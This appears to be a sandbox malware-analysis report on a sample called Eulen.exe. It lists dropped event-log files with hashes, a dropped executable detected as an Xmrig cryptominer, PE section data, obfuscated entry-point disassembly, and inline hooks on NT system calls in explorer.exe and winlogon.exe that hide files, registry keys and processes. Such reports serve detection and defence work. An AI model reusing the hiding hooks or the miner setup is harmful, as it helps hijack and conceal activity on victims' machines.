                                                                              SHA-512:C00665A8527B92BB677696119894947DA47603CD1168B3536E7317E8D82C1A3563D50612C4AEF5BDEE75D491AEC97F8AB543F5FA1EB5E4080E7B1D8A55FE57E6
                                                                              Malicious:false
                                                                              Preview:ElfChnk.............................................u.=k....................................................................Z}#.................N.......................v...=...........................................................................................................................f...............?...........................m...................M...F...............................'...........................................................................&.......................................**.................sf..........Z..&........Z.. ..Z...`............A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):82280
                                                                              Entropy (8bit):4.357737910766646
                                                                              Encrypted:false
                                                                              SSDEEP:384:MIRPRkTaReuZhlR0CsRNHHRoR0kRpayRNRRmRPRkTaRymXR9XPRFrRXVRcrRb8RC:M1uZiDQm3X3NI538LMwuZiDBIX
                                                                              MD5:DCFADD8D63F54E90C93512F8DF8D4846
                                                                              SHA1:D12A6CB8A6DC07EC55256A66DE15CEAF4D8E7F56
                                                                              SHA-256:0489FC8ED49FFE792F12A775955B17B866BFDBD86AC1F7A32BCE1DE257B78DED
                                                                              SHA-512:CF2843D5552FCBCACDDE247BFEA43F5A7D4027535681646E98D618D28261EFD0B5755B9EF40170C8B90BB7D78C9A1A1123DB50E8979066A3690ECEE8E256C386
                                                                              Malicious:false
                                                                              Preview:ElfChnk.J.......S.......J.......S............,......[.l.......................................................................2....................C.......Q............+..=.......................................0"..d...................?*..7#...........................................*......(...f...+...........?....................... .......................M...F........*.......*..............................&...........................................................a)..................................*...**......Q.......0.B..1.........'.z&...............................................................<.......T...-.!................@0.B..1..e.p..?.D.e.YY".........Q....................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.W.M.I.-.A.c.t.i.v.i.t.y.......#F.~.J.{..M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.W.M.I.-.A.c.t.i.v.i.t.y./.O.p.e.r.a.t.i.o.n.a.l..............*...................P.r.o.t.e.c.t.i.o.n.M.a.n.a.g.e.m.e.n.t.......w.m.i.p.r.v.s.e...e.x.e.......".%.P.r.o.g.r.a.m.D.a.t.a.%.\.M.i.c
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):4.282820835556058
                                                                              Encrypted:false
                                                                              SSDEEP:384:chOhpuhdh+h9hthXhzh8cghshqh9hihXhMhxhzhwhohGh5h3hShChWhzhLhahYhr:cQsFpkBc1S
                                                                              MD5:7DB7567819F7CFC6955126B8306826E6
                                                                              SHA1:45CCB1C41CA1C6E1384207444A8B84437408DF1A
                                                                              SHA-256:0DDCE2B5ADFAAB4EF8A1686D0064B8CCFF43B1D3C93893A62EF07B7FB896E8E5
                                                                              SHA-512:FF5F662885580210B522215F56FD29417B6555F0878610D44D8F798E044876F99F86C5FF688BB77C92B894368E5DF32130B52BFE37401BACD3305B63463A2394
                                                                              Malicious:false
                                                                              Preview:ElfChnk.........................................P.....Q................................................................................................................:...=...........................................................................................................................f...............?...........................m...................M...F...........................................................................................................&...............!.......................**...............k..f..........Z..&........Z.. ..Z...`............A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):1.232783163157918
                                                                              Encrypted:false
                                                                              SSDEEP:384:ZhOVPiVcVCVC7VNVtVEV3Vob7V5VXVmVbVoV/VEVptVtVBVnVOVMV3VJmVhpVEVA:Zyjbj
                                                                              MD5:71A005B17A2D32C10709277023D447E6
                                                                              SHA1:14754F04007D539159F75D62AACC6A282CAA8D54
                                                                              SHA-256:6E220C6CCBB76AEE639EDFCC6204C80EEC9FA1CCE0AC40EE4B821AF3AC27887B
                                                                              SHA-512:BC3533B3DEF1BC8B7D990700CA573EFF57D05C4E72DF2BB536247466D5FE9EB5DFE6F2EC18F02C808449F998AC00E26E920E3984B4E8367F8E9AF188BD1D9518
                                                                              Malicious:false
                                                                              Preview:ElfChnk.........!...............!............7..`8...).....................................................................Ce.~................&...........................=...........................................................................................................................f...............?...........................m...................M...F...........................&...............................v................................................+......................................**..P...........y................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):4.214262148200159
                                                                              Encrypted:false
                                                                              SSDEEP:384:whZBwBjsrBwBhBwBj4BwB6p+/4WBwBQ/cBwBjQNqObx13ABwBqhdBwBQ/LQBwBQ0:wOsc6QNqObxiyS3qes
                                                                              MD5:AE26023DBA544E04BF2770D4367BD58A
                                                                              SHA1:DB4C811E61D89A0843A9E603D95BC8AC4D4B350E
                                                                              SHA-256:DE559CEB6EF4611E677724B38962B5EEB0DF4F3BBB997CF38DA5BF678372286A
                                                                              SHA-512:DC1F6FEEDEADF67D8122D68D7DCED925B15FDF48A3912975302C3E21692434E7FB0EC3CEA1585703027DF4CDEEB6AD957F73C8B70581D8FB339C668CAAC0D396
                                                                              Malicious:false
                                                                              Preview:ElfChnk.^.......m.......^.......m...........@;..p>..9.T7.....................................................................#..............................................=...........................................................................................................................f...............?...........................m...................M...F...........................g...............................................................................&.......................................**.. ...^...........f..........Z..&........Z.. ..Z...`............A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):4.414298413407747
                                                                              Encrypted:false
                                                                              SSDEEP:384:3thQUE2UEFUE5UEKUEODUEzUEFUEsUE/UEGUE6UEWUE9UEtUEBUE8UEGUEuUE5UD:9w/RPoP6e
                                                                              MD5:77D9AFD001F6BBD592C19652D671FEA3
                                                                              SHA1:B87EA73299713B00D44A123C4B48636957EA90CE
                                                                              SHA-256:E25E174DE18D3B90B5EBC3C394A7C6BFC34F3E27FB260758BC8CB135E4D45770
                                                                              SHA-512:C81A545351015315060E812535A43C97A0FCBC2F49AA2034B50F963839F7F7DC1BC16EF070D5FF951E5FE82A9B315E8EFC20470707FD8C995A932E44369845E8
                                                                              Malicious:false
                                                                              Preview:ElfChnk.........................................8...,..t......................................................................>................*.......................R...=...........................................................................................................................f...............?...........................m...................M...F...........................................................................................................&.......................................**..............._..f..........Z..&........Z.. ..Z...`............A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):68128
                                                                              Entropy (8bit):4.245775357894047
                                                                              Encrypted:false
                                                                              SSDEEP:384:rFRMFR7TjoNSg0PtocChoLu60zCwySonMt0SoHMtoLoHMtaoDoH5OD0obO9ZoJfM:Rg7Fj0Dyid9sWryVpxy
                                                                              MD5:C0B6774D86D605AB4928604C71921147
                                                                              SHA1:989D3EE0B69DF7C26F20D6B6381AC1FD784D7F74
                                                                              SHA-256:432A56CE44EA14643B1055296D5F6F229C7100CF68EE56487DED56DCC0B1189D
                                                                              SHA-512:CB1554BEC94E4E3B55569AABA1E34F15E59B47106DDB865195E938801BBE1C42031898D6C4E9246404EC0B9503C2584E556559D96DEF7B9BD12CD002C50B2C70
                                                                              Malicious:false
                                                                              Preview:ElfChnk......................................... ...]..6....................................................................-.^.....................s...h...............N...=...................................................N...............................................w.......6......................./...................................]...........).......M...T...:...............................................................................................................&...............................**.. ............=6..1..........*.&.........*.9.LS5..f....A.......A..5...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.....^...........oT..S.y.s.t.e.m....A...............{..P.r.o.v.i.d.e.r.......F=.......K...N.a.m.e.......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.E.v.e.n.t.l.o.g..........)...G.u.i.d.....&.{.f.c.6.5.d.d.d.8.-.d.6.e.f.-.4.9.6.2.-.8.3.d.5.-.6.e.5.c.f.e.9.c.e.1.
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):81864
                                                                              Entropy (8bit):4.457227077605972
                                                                              Encrypted:false
                                                                              SSDEEP:768:bG4xG4LMo46/iP6f/Qc++PH+YekkG4dRg7V:f9LMFfP6A+PZd6dm
                                                                              MD5:913406986D5EFDE1F08F89A853D41557
                                                                              SHA1:F220BD99F8D2F34428786082375CE47396D6A350
                                                                              SHA-256:AA28373D50642BCFD3045B13EF1C2F7EA510FE4F5FFB5929FD07145B33738591
                                                                              SHA-512:378699FA9BF32080F38066AA7EBC929A5503311FFF5B4ECF9AA5711816836DF5D939B2E1494C811C4E4B2DE476A9FE32735C9D056D1AB5FE6CB1B9CED5145718
                                                                              Malicious:false
                                                                              Preview:ElfChnk.........................................x...E].W....................................................................\..t....................s...h...................=...................................................N...............................................w.......2.......................G...................................Y...........).......M...5...:........................................................................................................... ...........................&.......**...............=6..1.........#m.&........#m...].N.I.P.=.......A..1...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.....Z...........oT..S.y.s.t.e.m....A...............{..P.r.o.v.i.d.e.r.......F=.......K...N.a.m.e.......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.E.v.e.n.t.l.o.g..........)...G.u.i.d.....&.{.f.c.6.5.d.d.d.8.-.d.6.e.f.-.4.9.6.2.-.8.3.d.5.-.6.e.5.c.f.e.9.c.e.1.
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):154360
                                                                              Entropy (8bit):3.8558072725256203
                                                                              Encrypted:false
                                                                              SSDEEP:1536:zeLqbrBFCM0PomI7hUh8eLqbrBFCM0PomI7hUhMhxJVf+9f9f+AHF5bx7CQRILqo:zbzhxJVfl
                                                                              MD5:E27F56D89F043E072334B26B4913CBEB
                                                                              SHA1:690106AD69CDE849069F2DA59385278302DDE0A6
                                                                              SHA-256:010648803B9D542D81C348B9DDCDDCE65EF6646FA7849DD05FC7041C000FAB90
                                                                              SHA-512:5484FC097F667AA17A684FD573509F4CB4410A230A73B00A9BF7DFEA86D891DB4FD34E3DCD6FFBB2611B6400EA2607C9218098BD1F57741A3CBAFDDAE4C9912B
                                                                              Malicious:false
                                                                              Preview:ElfChnk.................i.......x...........pl...v...........................................................................3g............................................=..........................................................................................................................._...............8...........................f...................M...c...........................p...............&.......................................................................................................**......i........J...1........!j..&.......!j....:Tc`.)..h........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..R............{..P.r.o.v.i.d.e.r.../....=.......K...N.a.m.e.......P.o.w.e.r.S.h.e.l.l..A..M...s........a..E.v.e.n.t.I.D...'............)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n............
                                                                              Process:C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe
                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):5536256
                                                                              Entropy (8bit):6.689058470432344
                                                                              Encrypted:false
                                                                              SSDEEP:98304:VJuCqT8q5Jt3eM2UIDLeIY3I7LMHrPZF6OhgIDxDjP5ysRAwRCVYFufw6:zulp5JtBF6Oh3DxxysRFkRw6
                                                                              MD5:8FA2F1BA9B9A7EA2B3C4DD627C627CEC
                                                                              SHA1:358E3800286E5D4C5662366AD7311BC5A51BA497
                                                                              SHA-256:78A452A6E1A3951DC367F57ACE90711202C824B68835C5DB86814F5B41486947
                                                                              SHA-512:74EDD438B806E086A3FACBE8FB98E235068C0D3F8572C6A3A937649CA0E9A6BCB9F0B42E5562E1CBE3576B011AB83730FC622B1496CC448DD3C296284671E775
                                                                              Malicious:true
                                                                              Yara Hits:
                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: C:\Windows\Temp\auqpbnqlvfdv.tmp, Author: Joe Security
                                                                              • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: C:\Windows\Temp\auqpbnqlvfdv.tmp, Author: unknown
                                                                              • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: C:\Windows\Temp\auqpbnqlvfdv.tmp, Author: Florian Roth
                                                                              • Rule: MALWARE_Win_CoinMiner02, Description: Detects coinmining malware, Source: C:\Windows\Temp\auqpbnqlvfdv.tmp, Author: ditekSHen
                                                                              Antivirus:
                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                              • Antivirus: ReversingLabs, Detection: 70%
                                                                              Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$................................................................i..............C..Q....i.....i.....i........}....i.....Rich...........PE..d.....(d..........".......9...D.......6........@..............................~...........`.................................................|.P......P~.......{..............`~......AM......................BM.(... AM.8.............9..............................text...^.9.......9................. ..`.rdata........9.......9.............@..@.data.....+...P.......P.............@....pdata........{.......Q.............@..@_RANDOMXV.....}.......S.............@..`_TEXT_CN.&....}..(....S.............@..`_TEXT_CN..... ~.......S.............@..`_RDATA.......@~.......S.............@..@.rsrc........P~.......S.............@..@.reloc.......`~.......S.............@..B........................................
                                                                              File type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                              Entropy (8bit):7.944524618338768
                                                                              TrID:
                                                                              • Win64 Executable (generic) (12005/4) 74.95%
                                                                              • Generic Win/DOS Executable (2004/3) 12.51%
                                                                              • DOS Executable Generic (2002/1) 12.50%
                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.04%
                                                                              File name:Eulen.exe
                                                                              File size:44'977'152 bytes
                                                                              MD5:f8dd965fe02f49c93f22972470d480b3
                                                                              SHA1:859b8399768955c861037b246ca458e847041622
                                                                              SHA256:acbae9fb2fe0b90eb94c09bc11726a544ffd22fb5ed20f4477227979e88fdc7d
                                                                              SHA512:c1cda92f3f83b50ccf8917920081f89675735eddf2020e1ad3b7429a46268c8893db7b27c80daa673f29ffd4b2523220d3852d1c76883ae1e7e35645b11588f4
                                                                              SSDEEP:786432:0k1E58Eufbqc0mWvEjgYsvdT/sG8r+KMbDna+ioiYL:07O7DqJ5EjgYu38yfbDHL
                                                                              TLSH:29A7336776D53375E1C34A08D1C762DE62E031BADFAA490D24CBA9023921DD7CE83A77
                                                                              File Content Preview:MZ......................@.......................................hr......!..L.!This program cannot be run in DOS mode....$.......PE..d....A-g...............&.........&...Bp........@.............................P............`... ............................
                                                                              Icon Hash:00928e8e8686b000
                                                                              Entrypoint:0x1467042b8
                                                                              Entrypoint Section:.D6u
                                                                              Digitally signed:false
                                                                              Imagebase:0x140000000
                                                                              Subsystem:windows gui
                                                                              Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, DEBUG_STRIPPED
                                                                              DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
                                                                              Time Stamp:0x672D419F [Thu Nov 7 22:39:27 2024 UTC]
                                                                              TLS Callbacks:0x4672eecb, 0x1, 0x40010dc0, 0x1, 0x40010d90, 0x1
                                                                              CLR (.Net) Version:
                                                                              OS Version Major:5
                                                                              OS Version Minor:2
                                                                              File Version Major:5
                                                                              File Version Minor:2
                                                                              Subsystem Version Major:5
                                                                              Subsystem Version Minor:2
                                                                              Import Hash:e0feb4a7ecccf71bc73fce04f6c90c98
                                                                              Instruction
                                                                              inc ecx
                                                                              push edi
                                                                              pushfd
                                                                              dec ecx
                                                                              mov edi, 4BB88C29h
                                                                              sub dword ptr [edx+4151FBB0h], edx
                                                                              neg edi
                                                                              inc ecx
                                                                              setl bh
                                                                              inc ecx
                                                                              push esp
                                                                              dec esp
                                                                              mov edi, dword ptr [esp+18h]
                                                                              dec eax
                                                                              mov dword ptr [esp+18h], EB49BDCDh
                                                                              push dword ptr [esp+10h]
                                                                              popfd
                                                                              dec eax
                                                                              lea esp, dword ptr [esp+18h]
                                                                              call 00007FAB2508FBB4h
                                                                              push esi
                                                                              cmc
                                                                              inc ecx
                                                                              xorps xmm3, dqword ptr [ecx+3CF0A63Bh]
                                                                              popad
                                                                              inc ecx
                                                                              div dword ptr [esi+71392461h]
                                                                              div dword ptr [esi+61012061h]
                                                                              div dword ptr [esi-4E9D979Fh]
                                                                              div dword ptr [esi+41711861h]
                                                                              div dword ptr [esi+27112061h]
                                                                              shr ch, 1
                                                                              dec edi
                                                                              mov esi, C232CB62h
                                                                              push ecx
                                                                              popfd
                                                                              wait
                                                                              jbe 00007FAB24B8D26Ah
                                                                              movsb
                                                                              outsd
                                                                              xor al, 06h
                                                                              sbb ebx, edi
                                                                              movsb
                                                                              jnc 00007FAB24B8D235h
                                                                              xor ecx, esi
                                                                              sbb ebx, edi
                                                                              movsb
                                                                              pop edi
                                                                              outsb
                                                                              or eax, B662899Eh
                                                                              dec ebp
                                                                              mov ebp, 051C0DB5h
                                                                              push ecx
                                                                              mov ebp, 41F844CCh
                                                                              pop ds
                                                                              scasd
                                                                              inc edi
                                                                              pop ebx
                                                                              inc esi
                                                                              cmp dh, dl
                                                                              in al, EFh
                                                                              adc eax, dword ptr [eax-37h]
                                                                              test edx, ebp
                                                                              jc 00007FAB24B8D29Bh
                                                                              dec esi
                                                                              xchg dword ptr [711DDB9Ah], esp
                                                                              push edi
                                                                              int1
                                                                              aas
                                                                              mov cl, 07h
                                                                              dec edx
                                                                              mov edx, esi
                                                                              cli
                                                                              jl 00007FAB24B8D2D8h
                                                                              push esp
                                                                              cmc
                                                                              mov dword ptr [ecx+ebx*2+19h], ebx
                                                                              cwde
                                                                              mov bl, DBh
                                                                              inc esi
                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x4c9cc500x64.D6u
                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x6ee40000x388.rsrc
                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x6edeb700x3b4c.D6u
                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x6ee30000xfc.reloc
                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x4424d300x28.D6u
                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x43fe0000x68.+.:
                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                              .text0x10000x1b2100x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                              .data0x1d0000x38895400x0d41d8cd98f00b204e9800998ecf8427eunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                              .rdata0x38a70000x3e100x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                              .pdata0x38ab0000x123c0x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                              .xdata0x38ad0000xf4c0x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                              .bss0x38ae0000x25c00x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                              .idata0x38b10000xa340x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                              .CRT0x38b20000x600x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                              .tls0x38b30000x100x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                              .@yC0x38b40000x3880x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                              .j]_0x38b50000xb480a60x0d41d8cd98f00b204e9800998ecf8427eunknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                              .+.:0x43fe0000x9280xa004f66c6821e646ac78fb4a2f2035ad352False0.028125data0.16935542433642847IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                              .D6u0x43ff0000x2ae36bc0x2ae3800d3f05028aee65b6421bac6ed60e8b436unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_NOT_PAGED, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                              .reloc0x6ee30000xfc0x20033b8aa63bf4d2fae8774ffab27e42b88False0.380859375data2.492499062456381IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                              .rsrc0x6ee40000x3880x4002c9fe54028274d83c4a5970835085d5aFalse0.453125data5.032670505065661IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                              RT_MANIFEST0x6ee40580x330XML 1.0 document, ASCII textEnglishUnited States0.508578431372549
                                                                              DLLImport
                                                                              KERNEL32.dllCloseHandle
                                                                              msvcrt.dll__C_specific_handler
                                                                              KERNEL32.dllGetSystemTimeAsFileTime
                                                                              KERNEL32.dllHeapAlloc, HeapFree, ExitProcess, GetModuleHandleA, LoadLibraryA, GetProcAddress
                                                                              Language of compilation systemCountry where language is spokenMap
                                                                              EnglishUnited States
                                                                              No network behavior found

                                                                              Code Manipulations

                                                                              Function NameHook TypeActive in Processes
                                                                              ZwEnumerateKeyINLINEexplorer.exe, winlogon.exe
                                                                              NtQuerySystemInformationINLINEexplorer.exe, winlogon.exe
                                                                              ZwResumeThreadINLINEexplorer.exe, winlogon.exe
                                                                              NtDeviceIoControlFileINLINEexplorer.exe, winlogon.exe
                                                                              ZwDeviceIoControlFileINLINEexplorer.exe, winlogon.exe
                                                                              NtEnumerateKeyINLINEexplorer.exe, winlogon.exe
                                                                              NtQueryDirectoryFileINLINEexplorer.exe, winlogon.exe
                                                                              ZwEnumerateValueKeyINLINEexplorer.exe, winlogon.exe
                                                                              ZwQuerySystemInformationINLINEexplorer.exe, winlogon.exe
                                                                              NtResumeThreadINLINEexplorer.exe, winlogon.exe
                                                                              RtlGetNativeSystemInformationINLINEexplorer.exe, winlogon.exe
                                                                              NtQueryDirectoryFileExINLINEexplorer.exe, winlogon.exe
                                                                              NtEnumerateValueKeyINLINEexplorer.exe, winlogon.exe
                                                                              ZwQueryDirectoryFileExINLINEexplorer.exe, winlogon.exe
                                                                              ZwQueryDirectoryFileINLINEexplorer.exe, winlogon.exe
                                                                              Function NameHook TypeNew Data
                                                                              ZwEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                                              NtQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                                              ZwResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                                              NtDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                                              ZwDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                                              NtEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                                              NtQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                                                                              ZwEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                                              ZwQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                                              NtResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                                              RtlGetNativeSystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                                              NtQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                                              NtEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                                              ZwQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                                              ZwQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                                                                              Function NameHook TypeNew Data
                                                                              ZwEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                                              NtQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                                              ZwResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                                              NtDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                                              ZwDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                                              NtEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                                              NtQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                                                                              ZwEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                                              ZwQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                                              NtResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                                              RtlGetNativeSystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
